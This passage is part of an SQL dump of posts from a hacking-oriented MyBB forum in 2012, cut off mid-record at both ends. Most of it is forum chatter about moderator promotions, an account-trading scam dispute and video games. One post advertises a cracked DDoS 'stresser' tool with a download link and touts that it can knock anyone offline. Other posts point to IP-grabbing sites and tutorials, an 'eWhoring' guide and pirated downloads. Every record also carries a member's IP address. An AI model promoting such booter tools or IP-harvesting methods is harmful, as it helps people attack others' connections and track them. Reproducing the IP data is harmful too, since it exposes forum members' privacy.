'[quote=\'iTzIpod\' pid=\'4803\' dateline=\'1350344771\']\nHow come I don\'t get promoted to SMod? :o\n[/quote]\n\n1. You don\'t trust me.\n2. He is just a Mod.\n3. Virtual was promoted because LH partnered up with his website.\n\n\nhttp://l33thacking.net/thread-887.html', '72.231.24.165', '1223104677', '1', '0', '1', '1350354165', '1', 'eaaf66ec8bc7ed5b17bf4181b1c1f258', '0', '1350354165'); INSERT INTO mybb_posts VALUES('4822', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '100', '??zg???g????61', '1350353047', 'Hey bro I\'ll take whatever this is, lol thanks in advance man ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'c52f46ef40699db05d53c6a4612a88e7', '0', '0'); INSERT INTO mybb_posts VALUES('4823', '887', '0', '3', 'How did virtual become Mod? Explanation here', '0', '1', 't3h jok3r', '1350353469', 'The truth is that he a former S.mod of elite lobby, a site that is owned by my rival. Couple of weeks ago when the site was dead and it had no activity I offered him a S.mod spot but he was away and when he came back LH had already picked up it\'s activity and I had to keep my \"promise/deal\" of making him a S.mod but I couldn\'t so I gave him a Mod position. Virtual ONLY moderates specific forums, HE WILL AND CAN BE REMOVED IF HE ABUSES HIS POWERS OR STAYS INACTIVE/LQ.\r\n\r\nNow next, I have been counting and I have received the 29th staff request today, the next time someone requests me to make them a staff I will ban them.\r\n\r\nI have been discussing about making Virtual a Mod with NXK and Apathy, I don\'t pick new staff. It\'s either the community will pick them or all the LH staff discuss and vote for our new mod. Remember the more you request the lower your chances are. \r\n\r\nSome people that were Mods and staff on LH which were removed will not be added back, they have to build up their chances like everyone else.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '34545e299a973640415db5cccaa32609', '0', '0'); INSERT INTO mybb_posts VALUES('4824', '515', '4805', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1350354091', '[quote=\'iTzIpod\' pid=\'4805\' dateline=\'1350344861\']\r\nLol. I voted yesterday. You can vote every 24 hours.\r\n[/quote]\r\n\r\nYup but they won\'t count because the accept unique votes only.\r\n\r\nAs you can see [url=http://forumtopsites.net/?a=stats&u=joker]here[/url] in the \"monthly\" tab that we have 81 total votes but only \"unique\" votes are counted which are 48 this month.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '063c60f8c90ea38c2ea7e682cfdba35b', '0', '0'); INSERT INTO mybb_posts VALUES('4825', '829', '4755', '74', 'RE: Adventure Quest Worlds', '0', '2', 'Apathy', '1350356034', '[quote=\'iTzIpod\' pid=\'4755\' dateline=\'1350301117\']\r\nI use DarkMystic 3.3\r\nAnd also BotQuestWorlds 1.8 :p\r\n[/quote]\r\n\r\nWhere can I get these?', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '529ad6cf3884e8aef1235c971e9c0bd9', '0', '0'); INSERT INTO mybb_posts VALUES('4826', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '2', 'Apathy', '1350356139', 'It is a understandable situation. You could not go back on your word.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '72b6476947d8b22668d96a6b8dc38d83', '0', '0'); INSERT INTO mybb_posts VALUES('4827', '699', '3559', '47', 'RE: [All Members] Advance Member System', '0', '2', 'Apathy', '1350356197', 'Reborn this forum is not a post and pm forum. Just post download links.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '238cbb052a23cec07fedb63de4e64c37', '0', '0'); INSERT INTO mybb_posts VALUES('4828', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '82', 'iTzIpod', '1350356450', 'Can you explain why I was demoted though?\nDid I abuse my powers or anything?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dba79ce0e4fb66f4b5338f9316080ce4', '0', '0'); INSERT INTO mybb_posts VALUES('4829', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350356489', 'Google it :p\n\n\nLol\n\nOT: Greed why did you scam me?\nYou changed the password on all the accounts. What the fuck bro..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a17d379f64b7bd11297cdef1d2fbd9a1', '0', '0'); INSERT INTO mybb_posts VALUES('4830', '699', '3559', '47', 'RE: [All Members] Advance Member System', '0', '82', 'iTzIpod', '1350356522', 'Wait. So is he away or not? :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '40227e4ef3661da17ec9874d0ee6d045', '0', '0'); INSERT INTO mybb_posts VALUES('4831', '883', '4784', '7', 'RE: Congratz virtual', '0', '82', 'iTzIpod', '1350356574', 'When did I imply that I did not trust you?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fa897d0de1ec48ac96f314de08c73a93', '0', '0'); INSERT INTO mybb_posts VALUES('4832', '888', '0', '7', 'Greed is a scammer', '0', '82', 'iTzIpod', '1350357160', 'Greed and I traded accounts yesterday.\r\n\r\nI gave him MY Personal Minecraft Account including full information.\r\nAnd I went first obviously.\r\n\r\nAnd so I gave him my Minecraft Username, Minecraft Email, Minecraft Password, & Minecraft Security Questions.\r\nEtc\r\nI changed it obviously before we made this trade.\r\nSo then he payed his end of the deal.\r\n\r\nHe gave me his AQW Account (User & Password)\r\nand then changed it to one of my emails.\r\nAnd then I changed the password on it.\r\n\r\nI got disconnected because the server was overpopulated.\r\nAnd then I tried to log back on.\r\nTurns out, I \"typed\" my password wrong.\r\n\r\nI tried numerous times. Trying to use his password and my password until the account got locked for 10 minutes.\r\nAnd then I tried to contact Greed on Skype.\r\nThough he isn\'t offline...\r\n\r\nWhat he did?\r\n\r\nHe went on his email and clicked on a link that recovers everything back to normal.\r\nSo his email is changed back to his, his password is back to normal, etc.\r\nBut he then changed his password so I can\'t login.\r\n\r\nGreed. I\'m not butthurt or anything. I just wanted to know why you did that.\r\n\r\nExplain below?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '770d2b3d62e0ed8a5eb92f0fab5265d2', '0', '0'); INSERT INTO mybb_posts VALUES('4833', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '3', '??????????¢™', '1350357898', 'Just what I was looking for, Thanks for letting us know.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '92f99cae80ef0bdf4b7601580d6fc90c', '0', '0'); INSERT INTO mybb_posts VALUES('4834', '888', '4832', '7', 'RE: Greed is a scammer', '0', '3', '??????????¢™', '1350357981', 'Scammers are not welcome here, Greed explain yourself before we take action.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5416d1a92540f83e18d2f6610b695cae', '0', '0'); INSERT INTO mybb_posts VALUES('4835', '699', '4827', '47', 'RE: [All Members] Advance Member System', '0', '3', '??????????¢™', '1350358115', '[quote=\'Apathy\' pid=\'4827\' dateline=\'1350356197\']\r\nReborn this forum is not a post and pm forum. Just post download links.\r\n[/quote]\r\n\r\nI know it is not a post and pm forum. It doesnt say Post and PM me it says Post below and I will PM you. J0ker said that I could do that.\r\n\r\nAlso IPod I am not away.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '7c15920f1025226e72d2b827bbdf3899', '0', '0'); INSERT INTO mybb_posts VALUES('4836', '888', '4832', '7', 'RE: Greed is a scammer', '0', '61', 'NXK', '1350358280', 'I will be taking care of this when I get a response. I do not Like scammers nor Are they welcome here.', '99.253.94.204', '1677549260', '1', '0', '61', '1350358292', '1', '45bf4950c70d761bb575620833e2b57e', '0', '1350358292'); INSERT INTO mybb_posts VALUES('4837', '888', '4832', '7', 'RE: Greed is a scammer', '0', '82', 'iTzIpod', '1350358648', 'Thanks for doing your job. I wouold\'ve repfucked him since there\'s an option for that now? :o\nI wonder if Mods can use it. Or if it\'s only SMods and Admins or whatsoever.\n\nIf only I was a Moderator. :p\nI would\'ve took action and informed you guys too.\n\nThanks again.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1be29fc3df6ecbbc4ea3779b0f493ba0', '0', '0'); INSERT INTO mybb_posts VALUES('4838', '887', '4828', '3', 'RE: How did virtual become Mod? Explanation here', '0', '1', 't3h jok3r', '1350358858', '[quote=\'iTzIpod\' pid=\'4828\' dateline=\'1350356450\']\r\nCan you explain why I was demoted though?\r\nDid I abuse my powers or anything?\r\n[/quote]\r\n\r\nWhen I asked you if you want to stay on L33T Hacking or not, you said you will are leaving LH forever and you are going to Anarchy for everso then I asked you if you still want to keep your userbars and you said \"I don\'t care\" so I demoted you but then after 3 days you came back. I can\'t make you a Mod again unless you are active again and build up your chances like others. When I was making the Apple Avatar, you said that you didn\'t forgive me if I\'m not mistaken so how can I make you a Mod again?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ec3c89e1ec846ffa021f030c89b330ed', '0', '0'); INSERT INTO mybb_posts VALUES('4839', '888', '4837', '7', 'RE: Greed is a scammer', '0', '1', 't3h jok3r', '1350359070', '[quote=\'iTzIpod\' pid=\'4837\' dateline=\'1350358648\']\nThanks for doing your job. I wouold\'ve repfucked him since there\'s an option for that now? :o\nI wonder if Mods can use it. Or if it\'s only SMods and Admins or whatsoever.\n\nIf only I was a Moderator. :p\nI would\'ve took action and informed you guys too.\n\nThanks again.\n[/quote]\nWoah Woah Woah, I can say tomorrow that I\'m the son of \"Barack Obama\" but no one would believe me because there\'s no proof. We will take the necessary actions, we can not repfuck anyone on anyones request. Since NXK and IP are on it I will let them take care of it but off course look through the PMs.\n\nCan you post some screenshots of the deal?\n\nThanks for the report and can you tell us if you discussed this deal on Skype, LH or other instant messengers? Even if it was offsite we need as much information as possible.', '72.231.24.165', '1223104677', '1', '0', '1', '1350360223', '1', 'a189bfc9211fc24b7ff41ed81a3a6716', '0', '1350360223'); INSERT INTO mybb_posts VALUES('4840', '886', '4820', '35', 'RE: My logo', '0', '222', 'Exposé', '1350359435', 'Honestly I dont love it...it\'s too simple', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'de0781dfa2deb0431022794902f0db6d', '0', '0'); INSERT INTO mybb_posts VALUES('4841', '883', '4831', '7', 'RE: Congratz virtual', '0', '1', 't3h jok3r', '1350360350', '[quote=\'iTzIpod\' pid=\'4831\' dateline=\'1350356574\']\r\nWhen did I imply that I did not trust you?\r\n[/quote]\r\n\r\nI have nothing against you but if you haven\'t forgiven me so obviously you have something against me which brings it down to the fact that you might not trust me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '96bbcbb581cb2fa4ae35c15c3d3b50a2', '0', '0'); INSERT INTO mybb_posts VALUES('4842', '889', '0', '3', 'Vote for a new theme', '0', '1', 't3h jok3r', '1350361900', 'This thread will be moved in 2 days.\r\n\r\nVote for L33T Hackings new theme. Feel free to post your suggestions or themes that you think will look good on LH.\r\n\r\n[b]Theme 1[/b]\r\n[spoiler]\r\n[img]http://www.themefreak.net/img/gthree/index.png[/img]\r\n[/spoiler]\r\n\r\n[hr]\r\n\r\n[b]Theme 2[/b]\r\n[spoiler]\r\n[img]http://www.audentio.com/images/portfolio/sites/large/glowing.jpg[/img]\r\n[/spoiler]\r\n\r\n[hr]\r\n\r\n[b]Theme 3[/b]\r\n[spoiler]\r\n[img]http://www.audentio.com/images/portfolio/sites/large/darkice.jpg[/img]\r\n[/spoiler]', '72.231.24.165', '1223104677', '1', '0', '1', '1350362027', '1', '294435bf750d30f7c03cfdf8cb884a94', '0', '1350362027'); INSERT INTO mybb_posts VALUES('4843', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '84', 'Thunder™', '1350362617', 'Lol i was former admin of elite lobby u will make me admin :P', '111.91.75.158', '1868254110', '0', '0', '0', '0', '1', 'caec3191e2b604ed7d351d5e0eabaa6d', '0', '0'); INSERT INTO mybb_posts VALUES('4844', '869', '4712', '74', 'RE: who loves counter strike', '0', '84', 'Thunder™', '1350362687', 'I like CounterStrike :)))', '111.91.75.158', '1868254110', '0', '0', '0', '0', '1', '2e041600bb56996697fd0af1c96342e3', '0', '0'); INSERT INTO mybb_posts VALUES('4845', '882', '4777', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '53', 'sirchamp', '1350373235', 'Can I have the download.link thanks.', '91.112.114.162', '1534096034', '1', '0', '0', '0', '1', '46191ae8fef11b9c22cc3d2a59850b0c', '0', '0'); INSERT INTO mybb_posts VALUES('4846', '888', '4832', '7', 'RE: Greed is a scammer', '0', '62', 'R?????zo?', '1350374007', 'I think the fact that Greed is not replying to this thread it makes him scammer already.\nOh well, sorry to hear that iTzIpodz', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '738e49bb855c4f082eb2af0d4ba83c2d', '0', '0'); INSERT INTO mybb_posts VALUES('4847', '885', '4812', '71', 'RE: Who Has Already Pre-Ordered Black Ops 2 ?', '0', '62', 'R?????zo?', '1350374106', 'I pre-order the normal version, i won\'t play that much though :P', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '28c82b79d1e22e24543d541ae9363922', '0', '0'); INSERT INTO mybb_posts VALUES('4848', '868', '4710', '71', 'RE: whats the best COD', '0', '62', 'R?????zo?', '1350374171', 'Fyi Zombie mod exist since COD1 :)', '46.189.174.135', '784182919', '1', '0', '62', '1350374225', '1', '0a5012b1026948f5dfde5bfec86e735b', '0', '1350374225'); INSERT INTO mybb_posts VALUES('4849', '699', '3559', '47', 'RE: [All Members] Advance Member System', '0', '62', 'R?????zo?', '1350374312', 'Can I have this?\nThanks in advance bro.', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', 'afbd15a7f9d05d7d2008bc2ec9f4aeac', '0', '0'); INSERT INTO mybb_posts VALUES('4850', '780', '4024', '17', 'RE: Ultimate eWhoring Guide ? Never Seen Before ? $800/week! ?', '0', '62', 'R?????zo?', '1350374634', 'Your welcome, hopefully someone can make some good use of it.', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '399e20afce14ddf28c01ae5dfc05756d', '0', '0'); INSERT INTO mybb_posts VALUES('4851', '881', '4775', '35', 'RE: Which Signature Is Better ? | Rate My Graphics !!!', '0', '62', 'R?????zo?', '1350374706', '2nd one looks better indeed :)', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', 'eac0db5907fb032c50cedfef7b38161b', '0', '0'); INSERT INTO mybb_posts VALUES('4852', '886', '4820', '35', 'RE: My logo', '0', '62', 'R?????zo?', '1350374834', 'If you mean your avatar, no I don\'t.', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', 'dec007b70a67373fb5029dd39d209be0', '0', '0'); INSERT INTO mybb_posts VALUES('4853', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '62', 'R?????zo?', '1350375081', 'I was mod on elite lobby too :>\nbut I don\'t want to become one anymore ;)', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '657e804423dec40350a56f41dca75819', '0', '0'); INSERT INTO mybb_posts VALUES('4854', '883', '4784', '7', 'RE: Congratz virtual', '0', '62', 'R?????zo?', '1350375131', 'Congratz Virtual Legend ;)', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '57748ef25aacac85ca0cc66ab1db9ae6', '0', '0'); INSERT INTO mybb_posts VALUES('4855', '869', '4712', '74', 'RE: who loves counter strike', '0', '62', 'R?????zo?', '1350375242', 'I like CS, I still play abit of CS:GO\nBut I played every single one :P', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '0c599439978052e96473c707ec3c4981', '0', '0'); INSERT INTO mybb_posts VALUES('4856', '882', '4777', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '62', 'R?????zo?', '1350375308', 'Can I have the download, thanks alot.\nThis seems interesting :)', '46.189.174.135', '784182919', '1', '0', '62', '1350375342', '1', '66b7534672bfcf9a89544ac0a5a5e564', '0', '1350375342'); INSERT INTO mybb_posts VALUES('4857', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '62', 'R?????zo?', '1350375523', 'We are growing, atleast when I check new posts it has alot of how it sed to be.\nWe need to keep it up, refer people guys :)', '46.189.174.135', '784182919', '1', '0', '0', '0', '1', '992cd08b0999a9d8da6c3be263aeb608', '0', '0'); INSERT INTO mybb_posts VALUES('4858', '888', '4832', '7', 'RE: Greed is a scammer', '0', '257', 'XxTREYZxX', '1350377069', 'greed just proved hes a scanner by not replying to this thread as you were saying. and iTzIpod i feel so sorry for you :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'd449f1b3e1ed8812e929fa8617672bde', '0', '0'); INSERT INTO mybb_posts VALUES('4859', '881', '4775', '35', 'RE: Which Signature Is Better ? | Rate My Graphics !!!', '19', '257', 'XxTREYZxX', '1350377402', 'yeah i really like the second one :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '7825c370b0993b6063710f60ce5b830b', '0', '0'); INSERT INTO mybb_posts VALUES('4860', '890', '0', '71', 'Boreder lands 2', '0', '257', 'XxTREYZxX', '1350379627', 'hey l33T and i just wanted to say\r\nwho is getting borderlands 2, i am defiantly getting i think its great, thanks', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'ea3f97f69da7ae3df726719f46b615b4', '0', '0'); INSERT INTO mybb_posts VALUES('4861', '699', '3559', '47', 'RE: [All Members] Advance Member System', '0', '100', '??zg???g????61', '1350383495', 'Vouch! Thanks for the code ;DDD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'd4bff1e854e62ed49bbfee90382b2de9', '0', '0'); INSERT INTO mybb_posts VALUES('4862', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '100', '??zg???g????61', '1350384119', 'Ahhh thanks for the explanation I was wondering.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '5176aed1d088dabb2a944f5fa6341b46', '0', '0'); INSERT INTO mybb_posts VALUES('4863', '869', '4712', '74', 'RE: who loves counter strike', '0', '100', '??zg???g????61', '1350384365', 'Meh I played the game a bit I didn\'t really like it though.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '9b5908ebede8dab08a22aa251af362e2', '0', '0'); INSERT INTO mybb_posts VALUES('4864', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '205', 'mothered', '1350386819', 'It\'s good that you got this out In the open here, and clarified It for everyone to see.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '24371d98a9bccbb99fd656237ac951ac', '0', '0'); INSERT INTO mybb_posts VALUES('4865', '883', '4784', '7', 'RE: Congratz virtual', '0', '205', 'mothered', '1350387037', 'I don\'t know Virtual, but congratulations from me.\r\n\r\nFrom what I\'ve read about you, I\'m sure you\'ll do a great job.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a2e9a4bb32517fff1a00de5034441cbc', '0', '0'); INSERT INTO mybb_posts VALUES('4866', '882', '4845', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '228', 'VirtualLegend', '1350387089', '[quote=\'sirchamp\' pid=\'4845\' dateline=\'1350373235\']\r\nCan I have the download.link thanks.\r\n[/quote]\r\n\r\n[quote]Can I have the download, thanks alot.\r\nThis seems interesting [/quote]\r\n\r\nI have send both of you the Download link. Check your Inbox', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '3e9e4d8649b0e2436065fef08eeada4b', '0', '0'); INSERT INTO mybb_posts VALUES('4867', '869', '4712', '74', 'RE: who loves counter strike', '0', '205', 'mothered', '1350387232', 'I\'m not a Gamer, but friends of mine go all the way with gaming, and Counterstrike Is played by them very often.\r\n\r\nThey talk It up so much, and love It.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '52c67c1fc045059a5668f8c8bbda56eb', '0', '0'); INSERT INTO mybb_posts VALUES('4868', '872', '4737', '24', 'RE: Windows Updates, who uses It?', '0', '205', 'mothered', '1350387585', '[quote=\'Timmy\' pid=\'4737\' dateline=\'1350274830\']\r\nWhat exactly are your referring to?\r\n[/quote]\r\n\r\nYou don\'t know what a Windows Update Is?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '36118f80cf84c6d15ad9298a926bd105', '0', '0'); INSERT INTO mybb_posts VALUES('4869', '888', '4832', '7', 'RE: Greed is a scammer', '0', '82', 'iTzIpod', '1350388242', 'Will post the chat log. ( Skype )\n\nAnd also will post a SS of the account I gave him. \nAnd the account he gave me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9d0e62e36771602fa8d45a903cac3ac', '0', '0'); INSERT INTO mybb_posts VALUES('4870', '888', '4832', '7', 'RE: Greed is a scammer', '0', '61', 'NXK', '1350388528', 'Yeah we need more proof Before we can take any action.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '78b4b10e95df01102d45fc749df0cd0f', '0', '0'); INSERT INTO mybb_posts VALUES('4871', '888', '4832', '7', 'RE: Greed is a scammer', '0', '228', 'VirtualLegend', '1350388614', 'I\'m not defending him, but i think we need more proof. don\'t you think? Like Chatlog of Skype or other usefull proof. To see if his a scammer or not', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'dd262c5676166c9b2c7ff81bd59714d1', '0', '0'); INSERT INTO mybb_posts VALUES('4872', '872', '4717', '24', 'RE: Windows Updates, who uses It?', '0', '62', 'R?????zo?', '1350388812', 'windows updates are crap, theres not even a beta version before so they only test it when we(users) update it and if theres complaints they will just fix it on the next version.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '190a85ea570972029f7d442bdd69976d', '0', '0'); INSERT INTO mybb_posts VALUES('4873', '882', '4777', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '62', 'R?????zo?', '1350388843', 'Thanks bro, I will use it :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b0945c1bfa4c87b65ec5fed7b71120fb', '0', '0'); INSERT INTO mybb_posts VALUES('4874', '882', '4873', '9', 'RE: [ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '228', 'VirtualLegend', '1350389494', '[quote=\'R?????zo?\' pid=\'4873\' dateline=\'1350388843\']\r\nThanks bro, I will use it :)\r\n[/quote]\r\n\r\nNo problem Bro', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'f24a22538e6751f79bd3e1309f215e09', '0', '0'); INSERT INTO mybb_posts VALUES('4875', '889', '4842', '3', 'RE: Vote for a new theme', '0', '228', 'VirtualLegend', '1350389652', 'It\'s difficult to choose but i choose theme 1', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '97836df50655b94cf44b08026ede7b1a', '0', '0'); INSERT INTO mybb_posts VALUES('4876', '75', '181', '13', 'RE: ~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '205', 'mothered', '1350390084', 'I usually use this: http://whatstheirip.com/\r\n\r\nThat said, nice Guides here mate. Good job.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '03205929134d94e58c9fafd9d89504d2', '0', '0'); INSERT INTO mybb_posts VALUES('4877', '886', '4820', '35', 'RE: My logo', '0', '228', 'VirtualLegend', '1350391700', 'Me nether It\'s Too Simple And Small. You can Search on Google for a Awesome Forum Avatar! Or you can make one', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2ef36236043f35926014fff0d0ea96eb', '0', '0'); INSERT INTO mybb_posts VALUES('4878', '891', '0', '35', 'My New Signature !!! | Rate My Signature', '17', '228', 'VirtualLegend', '1350393266', '[align=center][color=#FFFFE0][size=medium]Hey LH Members,\r\n\r\nI have made a new Signature and i think I\'m getting better with Photoshop. What do you think? and give me Tips!!!\r\n\r\nMy new Signature:\r\n[/size][/color][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '7a4f4e1018c82b180e94a226b9fb7283', '0', '0'); INSERT INTO mybb_posts VALUES('4879', '892', '0', '8', 'Post New And Awesome Songs Here !!!', '0', '228', 'VirtualLegend', '1350393859', '[color=#FFFFFF][size=medium][align=center]Hello,\r\n\r\nI Made this thread to see if theres any good and new song out.\r\nI Will begin; Flo Rida - I Cry\r\n[video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=TQaK5FsGKHI[/video]\r\nI love this song very much and i think you would like it too!\r\n\r\n[color=#32CD32][size=x-large]Who\'s Next?[/size][/color][/align][/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '1892a6eb63893105eb2a9bcd3710c35b', '0', '0'); INSERT INTO mybb_posts VALUES('4880', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350394159', 'I just sent a pm explaining everything I don\'t have time, I have to redo my entire computer now.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '60626be6232bfe5ddddbd47061f6d6ad', '0', '0'); INSERT INTO mybb_posts VALUES('4881', '75', '4876', '13', 'RE: ~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '100', '??zg???g????61', '1350394571', '[quote=\'mothered\' pid=\'4876\' dateline=\'1350390084\']\r\nI usually use this: http://whatstheirip.com/\r\n\r\nThat said, nice Guides here mate. Good job.\r\n[/quote]\r\n\r\nSame here, ^^', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '545cce9eb7a3923e98ee93199d99c174', '0', '0'); INSERT INTO mybb_posts VALUES('4882', '891', '4878', '35', 'RE: My New Signature !!! | Rate My Signature', '0', '100', '??zg???g????61', '1350394974', 'Thats a sexy signature ;D nice Photoshopping!', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'bc97342d356ccd8e5593b00eed79747c', '0', '0'); INSERT INTO mybb_posts VALUES('4883', '892', '4879', '8', 'RE: Post New And Awesome Songs Here !!!', '0', '100', '??zg???g????61', '1350395105', 'Pop That- French Montana.', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '6de91eaa09159acd1beb779a14b5e3a3', '0', '0'); INSERT INTO mybb_posts VALUES('4884', '825', '4320', '8', 'RE: Favorite Rappers?', '0', '100', '??zg???g????61', '1350395174', 'French Montana and Meek Mill ;D', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'be39a68c79f4a320a0d769dec3cdceff', '0', '0'); INSERT INTO mybb_posts VALUES('4885', '893', '0', '77', 'GamerTag Availability Checker Site', '0', '100', '??zg???g????61', '1350395912', 'Here is a simple Xbox Live Gamertag Checker Availability Site. Thought this might come in handy to some people.\r\n\r\n\r\nhttp://gamertagchecker.com/\r\n\r\n\r\nEnjoy ;D', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '4ebe821d610f65dfd3dbc07d11b632f8', '0', '0'); INSERT INTO mybb_posts VALUES('4886', '894', '0', '21', '[FREE] Anonymous Stresser [Cracked]', '0', '100', '??zg???g????61', '1350396459', 'Description and features;\r\n\r\nHas 1089 WORKING shells with 470+ private shells in it\r\nHas multi-threaded booting\r\nHost to IP Feature\r\nAbility to refresh the shells\r\nAbility to clear your internets cache (sends commands faster)\r\nAbility to boot multiple sites (sometimes even big ones)\r\nIt can boot anyones internet\r\nA site/IP pinger\r\nNO PORTFORWARDING!\r\nChose what port to attack on\r\nShell Rotation (in the HUB)\r\nProtection against dissassemblers\r\nAlot of dedi servers that I made myself\r\nNo time limit on booting\r\nPowerful booting\r\nA random about box\r\nA great working cookie/cache cleaner to speed up your attack\r\nBooting history (Recent IPs you have attacked)\r\nOption to choose a preset port\r\n\r\nDownload Link: http://www.mediafire.com/?mwifw4ald4hattp\r\n\r\nHave fun guys ;D', '96.237.179.21', '1626190613', '0', '0', '0', '0', '1', '3c3acc5f05bc61ddd638643542c8ecae', '0', '0'); INSERT INTO mybb_posts VALUES('4887', '895', '0', '4', 'D?ea saying hello<3', '0', '264', 'D?ea', '1350398963', 'Hello everybody, my name is Daniel, i\'m 19 years old, and i\'m working as an IT-Security expert.\r\nI got high knowledge in IT-Security, and i\'m an good coder.\r\nIn the future, you will see lot of coding tutorials, and tutorials on how to secure you computer, router and lot more!', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '5a2837e9131bf9276ef048b576e81a32', '0', '0'); INSERT INTO mybb_posts VALUES('4888', '888', '4832', '7', 'RE: Greed is a scammer', '0', '264', 'D?ea', '1350399079', 'Take some screenshots, and you will get more support from us.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '7535b01ac1e5981693f961a0b812dd84', '0', '0'); INSERT INTO mybb_posts VALUES('4889', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '62', 'R?????zo?', '1350399084', 'Welcome to the community, stay active and HQ.', '31.22.239.178', '521596850', '1', '0', '0', '0', '1', '92b6bb4848c358d33107046c65f4aeab', '0', '0'); INSERT INTO mybb_posts VALUES('4890', '895', '4889', '4', 'RE: D?ea saying hello<3', '0', '264', 'D?ea', '1350399136', '[quote=\'R?????zo?\' pid=\'4889\' dateline=\'1350399084\']\r\nWelcome to the community, stay active and HQ.\r\n[/quote]\r\nThanks man, I will of course stay HQ and active.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '9447143656fc3465886c410bd6729560', '0', '0'); INSERT INTO mybb_posts VALUES('4891', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '62', 'R?????zo?', '1350399140', 'Thanks alot for this bro.', '31.22.239.178', '521596850', '1', '0', '0', '0', '1', '607ff7457bd2c24f3ad87103a2f10bbf', '0', '0'); INSERT INTO mybb_posts VALUES('4892', '896', '0', '23', 'How to secure your Router', '0', '264', 'D?ea', '1350399187', '[align=center][size=xx-large]How to secure your Router[/size]\r\n[u][i][size=x-large]Written by D?ea[/size][/i][/u]\r\n\r\n[b][size=large]Before we start[/size][/b]\r\nTHIS it NOT a way to secure your router:\r\n[spoiler]\r\n[img]http://i.imgur.com/PU5ei.jpg[/img]\r\n[/spoiler]\r\n\r\n[b][size=medium]Okay, lets start![/size][/b]\r\n\r\n[hr]\r\n\r\n[b][size=large]Change the default password[/size][/b]\r\n[size=medium][i]Your router should ALWAYS have 